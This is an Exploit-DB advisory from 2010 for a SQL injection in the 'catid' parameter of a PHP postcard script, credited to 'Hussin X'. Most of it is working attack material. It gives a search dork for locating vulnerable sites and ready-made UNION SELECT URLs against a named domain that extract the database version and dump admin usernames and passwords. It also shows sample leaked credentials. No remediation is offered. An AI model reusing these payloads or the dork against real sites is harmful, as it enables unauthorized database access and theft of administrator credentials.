post Card catid Remote SQL Injection Vulnerability

2010-03-26T00:00:00
ID EDB-ID:11892
Type exploitdb
Reporter Hussin X
Modified 2010-03-26T00:00:00

Description

post Card ( catid ) Remote SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            post Card ( catid ) Remote SQL Injection Vulnerability
___________________________________

Author: Hussin X

Home : www.iqs3cur1ty.com<http://www.iqs3cur1ty.com> & www.iq-ty.com<http://www.iq-ty.com>

MaiL : darkangeL_G85@Yahoo.CoM
___________________________________

script : http://webbdomain.com/php/postcarden/index2.php
script : http://webbdomain.com/php/postcardir/index2.php
version : all
DorK : inurl:choosecard.php?catid=
_____

ExploiT & Demo
_______


version :

http://webbdomain.com/php/postcardir/choosecard.php?catid=-1+uniOn+select+version%28%29,555555555555,6666666666666666666+from+admin--

user & pass :

http://webbdomain.com/php/postcardir/choosecard.php?catid=-1+uniOn+select+concat%28username,0x3a,password%29,555555555555,6666666666666666666+from+admin--



Note : Exploit in Source page

Example :

<td><a style="text-decoration:none" href='chosencard.php?id=5.0.89-community // << version :D

<td><a style="text-decoration:none" href='chosencard.php?id=admin:admin' // << here user and pass